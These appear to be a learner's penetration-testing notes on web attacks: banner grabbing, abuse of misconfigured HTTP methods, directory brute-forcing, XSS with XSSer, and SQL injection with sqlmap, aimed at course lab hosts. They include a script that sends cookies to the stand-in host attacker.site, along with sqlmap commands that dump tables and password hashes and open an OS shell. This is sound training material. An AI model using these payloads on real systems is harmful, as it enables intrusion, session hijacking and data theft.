🌐Web Attacks

Notes for Attacking Web Apps from ePTS course + other recourses.

🔍Fingerprinting Web Server:

we are preforming Banner Grabbing bellow agiants HTTP(Netcat) & HTTPs(openssl).

Netcat

connect to an HTTP server.

nc <target_ip> 80 -v

send HTTP request (HEAD HTTP Verb/Method) [all HTTP req has 2 empty lines between the header & the body]

HEAD / HTTP/1.0

mostly when you click send you will get Server: header containing web server info(sometimes OS).

OpenSSL

connect to an HTTPs server & send your request:

openssl s_client -connect <target>:443
HEAD / HTTP/1.0

Auto-FP Web Server tools can detect small implementation to grab info, for exmple: Httprint (signature-based technique).

Httprint

most common Fingerprinting:

httprint -P0 -h <target> -s <signature_file>

-P0: avoid pinging (most web hosts don't respond to ping). -h: set host to IP or range of IP.

⚙️Exploiting Mis-Configed HTTP Methods

1-Enum available methods:

sendOPTOINS request to enum.

2-Exploit a method:

• DELETE

Exploiting DELETE Method.

• PUT

first, determine length of data.

-m to count with bytes.

send PUT req with nc.

Let's send a PHP shell with PUT:

use it in the following way:

send it like this:

📂Dir & File Enumeration

Tools:

• OWASP Dirbuster (Java, GUI). (/usr/share/dirbuster/wordlists)

• Dirb (C, CLI).

dirb site.com -a "user_agent" -c "cookie" -u "uname:pass"

get Useragent from: http://www.useragentstring.com/

-x extensions.txt: a file listing the desired extensiosns.

-o: save in output file.

• dirsearch (Python, CLI).

• wfuzz: use /FUZZ to place the world in here from the worldlist.

• gobuster (Go, CLI): brute-force URIs (directories and files), DNS subdomains, and virtual hostnames.

  gobuster dir -u http://<ip>:<port> -w <word_list_location>

  sudo gobuster dir -u http://<ip>:<port> -w /usr/share/seclists/Discovery/Web-Content/common.txt 

  gobuster dir -u http://<ip>:<port> -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,403,500' -e -p http://127.0.0.1:8080

  Run the proxy option with gobuster so it's all tracked in Burpsuite and the vulnerable site automatically crawls when it's found.

Assuming you downloaded a WorldList and would lie to modify it (delete lines) from terminal this StackOverFlow were helpful:

How do I delete the first n lines of an ascii file using shell commands?Unix & Linux Stack Exchange

🤞Cross Site Scripting (XSS)

Read more about it:

• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition.

• OWASP XSS Chapter.

Types:

• Reflected XSS, where the malicious script comes from the current HTTP request.

• Stored(Persistent) XSS, where the malicious script comes from the website's database.

• DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

A simple script to send cookie to attacker-controlled site:

<script>
var i = new Image();
i.src="http://attacker.site/get.php?cookie="+escape(document.cookie);
</script>

PHP script to Store cookie once received:

Accessing a cookie with JS:

<script>alert(document.cookie)</script>

XSSer:

Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

• Lunch the GUI:

xsser --gtk

• Post perm attack + Confirm vul:

find an XXS taget (with BurpSuite help to check the request)

xsser -u <url> -p <post_parm>

example:

xsser --url 'http://demo.ine.local/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

the output can confirm of target is vul.

after that you can: Trying various XSS payloads by using XSSer's "--auto" option.

• try various vul.

xsser -u <url> -p <post_parm> --auto

• Custome XSS payload:

xsser -u <url> -p <post_parm> --Fp "<script>alert(1)</script>"

Output: under Final attack:will generate a payload use it in BurpSuite,by replacing the POST, in this case, is the Target_host=

xsser final attack pasted and forwarded in BurpSuite.

Used--Fp alert('1') hence, after forward from BurpSuite notice the target.

• Get Attack:

inside a get perm in-which it's value get's reflected we can Subtitiute that var with XSS to specify we are targeting it. in an XSS command: xsser -u ""

the URL: http://demo.ine.local/index.php?page=user-poll.php&csrf-token=&choice=metasploit&initials=h1&user-poll-php-submit-button=Submit+Vote On this occasion metasploit, a radio option gets reflected to the website so the url becomes: http://demo.ine.local/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=d&user-poll-php-submit-button=Submit+Vote

xsser -u "url_with_XSS"

Now we know from the Output that it's vulnerable let's use a custom payload.

ser -u "url_with_XSS" --Fp "<script>print(1)</script>"

open the final_attck in the browser.

• crawl

xsser -u <url> -c 20 --Cl

-c: number of url to crawl in a target.

--Cl: crawl only local targets.

Blind XSS:

Blind XSS for beginnersMedium

great tut on what tool and how to start and were to spray

💉SQL Injection

Many types mainly:

• Retrieving hidden data, where you can modify an SQL query to return additional results.

• Subverting application logic, where you can change a query to interfere with the application's logic.

• UNION attacks, where you can retrieve data from different database tables.

• Examining the database, where you can extract information about the version and structure of the database.

• Blind SQL injection, where the results of a query you control are not returned in the application's responses.

⚠️ Before SQLMap:

for example test with:

'

' and 1=1;-- - 

checking for boolean SQLi also check false cases

'UNION SELECT 'str1', 'str2';-- -

to check for how many col does the Dev Select have keep increasing the 'str' until no error.

Basic SQLMap syntax:

GET req:

sqlmap -u <URL> -p <injection_parm> [options]

POST req:

sqlmap -u <URL> --data='<POST_str>' -p <parm> [options]

<POST_str>: comes from req intercepted by Burp Proxy.

ex: --data=="user=a&pass=a" -p user

Another way is to use Burp Proxy to intercept the request then save it as a file `request`:

sqlmap -r request -p <parm>

🍪Sometimes you might need a cookie as the vul might exists after login: --cookie=""

[options]: for exmaple --tables: to print all the tables or -b for banner

later --current-db <table_name> -columns: for each table in DB give me all col.

also add --dump: to get password hashes (for layter attacks with Hydra)

other [options]:

• --fresh-queries: bruteforce again don't just show prev bruteforce results.

• --technique= U for exmple Union base SQLi.

• --users : get users

• --dbs : get DB Names

• -D <DB_Name> --tables : get tables

• -D <DB_Name> -T <Table_name> --columns: get all cols

for exmaple after getting DB Table then col you can dumb it like this:

sqlmap -u <URL> -p <inj_prm> -D <DB_name> -T <t_name> -C col1,col2 --dump

Attacking a Union based SQLi:

sqlmap -u "http://vitxim.site/view.php?id=1121" -p id --technique=U

--technique=U tells SQLMap to use Union based SQLi on id GET param.

The --technique switch is to create less noise and prevent the service from shutting down due to query overload. If the given techniques do not work try it removing the switch.

exploiting POST param:

sqlmap -u <URL> --data=<POST string> -p param [OPTOINS]
sqlmap -u 'http://10.10.10.10/login.php' --data='username=some&password=thing' -p username --technique=B

<POST string>: can be copied from a req intercepted with Burp Proxy.

OS-Shell

sqlmap -u "http://10.10.10.10/login.php" --os-shell

SQLi can allow us to upload a file to a server thus gaining remote access via a WebShell.

https://community.rsa.com/t5/netwitness-blog/from-sql-injection-to-webshell/ba-p/521012community.rsa.com

SQL-Shell

sqlmap -u "http://10.10.10.10/login.php" --sql-shell

What can I do with an SQL shell using SQLMap?Information Security Stack Exchange

--sql-query & --sql-shell going beyound SQLmap capabilities